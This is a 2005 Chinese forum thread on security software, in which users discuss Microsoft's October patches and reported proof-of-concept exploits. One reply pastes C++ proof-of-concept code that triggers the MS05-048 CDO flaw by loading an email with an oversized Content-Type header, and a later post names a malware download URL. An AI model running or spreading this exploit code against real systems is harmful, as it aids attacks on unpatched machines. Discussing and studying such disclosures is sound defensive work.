天天泡泡 - 2005-10-16 14:19:00
距离微软MS发布10月安全公告才两天,针对MS最新的三个漏洞的概念型攻击代码就出现在网上了。
北京时间14日,法国著名的安全响应团队FrSIRT,在其网站上公布了针对MS05-044,MS05-045,和MS05-048的三个概念型的攻击代码。
MS05-044:Windows FTP 客户端中的漏洞可能允许篡改文件传输位置 (905495)
MS05-045:网络连接管理器中的漏洞可能允许拒绝服务 (905414)
MS05-048:Microsoft 协作对象中的漏洞可能允许远程执行代码 (907245)
根据8月份的"狙击波"速度来看,不久将有可能会被人利用.被关注的比较多的是:MS05-051. 来自国外安全厂商关于此漏洞的消息,称针对MSDTC(Microsoft Distributed Transaction Coordinator)漏洞可能会被病毒作者们利用,制造出新的蠕虫。尤其是WIN2000用户,可能再次遭受漏洞的攻击。根据最新的资料显示,针对WIN2000系统的MSDTC漏洞的攻击代码已经出现,在ImmunitySec Canvas customers中可以看到October 11, 2005: MS05-051 (MS DTC) Trigger for the bug in MS DTC on Windows 2000 (attach to msdtc.exe)以及October 14, 2005: ms_msdtc exploit。Russ Cooper(Cybertrust Inc.的高级工程师)称针对MSDTC漏洞的蠕虫可能会对3372端口进行扫描,并进行传播。本文来源于:动物家园(
http://www.kingzoo.com)反病毒斗士报
我是天才陈叙 - 2005-10-16 14:58:00
麻烦啊,又要更新了
卧龙传说 - 2005-10-16 16:45:00
明白,加强警戒
我用的就是2000
卧龙传说 - 2005-10-16 16:46:00
好象这几个补丁都打了
baohe - 2005-10-16 16:58:00
【回复“天天泡泡”的帖子】
暂不打10月份的补丁(9个)
考验一下TPF2005
C++果冻 - 2005-10-16 17:48:00
14号偶就见到这个消息了,这是其中针对MS05-048的代码:
//
// Microsoft CDO Proof of Concept Exploit by Gary O'leary-Steele <garyo at sec-1.com>
//
// Step 1.
//
// Create an E-mail named vuln.eml including a large "Content-Type:" header.
//
// Step 2.
//
// Compile with -GX option
//
#import <msado15.dll> no_namespace rename("EOF", "adoEOF")
#import <cdosys.dll> rename_namespace("CDO")
#include <stdio.h>
int main()
{
CoInitialize(0);
try
{
CDO::IMessagePtr spMsg(__uuidof(CDO::Message));
_StreamPtr spStream(spMsg->GetStream());
spStream->Position = 0;
spStream->Type = adTypeBinary;
spStream->LoadFromFile("vuln.eml");
spStream->Flush();
for(long i = 1; i <= spMsg->BodyPart->BodyParts->Count; i++)
{
CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item;
_variant_t v =
spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value;
}
}
catch(_com_error &e)
{
printf("COM error[0x%X, %s]\n", e.Error(),
(LPCTSTR)e.Description());
}
catch(...)
{
printf("General exception\n");
}
CoUninitialize();
return 0;
}
CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item;
_variant_t v =
spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value;
弹珠蓝宝 - 2005-10-16 19:03:00
我已经更新了,好象有9个啊
不动如山 - 2005-10-17 16:13:00
我也要看看
春天的野百合 - 2005-10-17 21:07:00
那种东西不是太懂!
二十五点 - 2005-10-17 23:12:00
防火墙里天天出现什么MS类型的 要更新麻烦啊
从头爱你 - 2005-10-18 7:46:00
晕
不是把```
北方孤狼 - 2005-10-19 16:27:00
又是2000
lqbing - 2005-10-19 16:54:00
我非政版,只好挨宰拉
我问我问 - 2005-10-19 19:54:00
我盗版的XP,不能更新的吧?行的话,麻烦给个地址
时光快乐 - 2005-10-19 20:02:00
风之方块 - 2005-10-20 9:41:00
74775262 - 2005-10-20 11:49:00
真该死 麻烦又来了。。。。困惑
洛神 - 2005-10-21 11:06:00
【回复“74775262”的帖子】
盗版的XP我都可以更新的
宇天龙 - 2005-10-21 23:19:00
明白,加强警戒
study2005 - 2005-10-22 4:26:00
该用户帖子内容已被屏蔽
普通人 - 2005-10-22 11:30:00
天天补日日漏............
绝世玩君 - 2005-10-22 19:12:00
灰客 - 2005-10-22 20:17:00
怎么有要打补丁啊!~~~~~~~~~~~~~~~~~~~~~~~晕!
0712 - 2005-10-22 20:34:00
Blaster Rpc Exploit
xinyu9608 - 2005-10-23 16:31:00
Winsows XP不受影响吧?
数据库看守所 - 2005-10-23 21:42:00
我的QQ只要和网友打开对话框就回自动弹出一个病毒网站http://www.18hi.net/film55.exe我该怎么删掉它啊?
逝去的风07 - 2005-10-24 18:01:00
哎,微软补丁多,病毒攻击更多!
z张小小z - 2005-10-26 8:58:00
就是XP的反版可以祉上吗?
© 2000 - 2026 Rising Corp. Ltd.
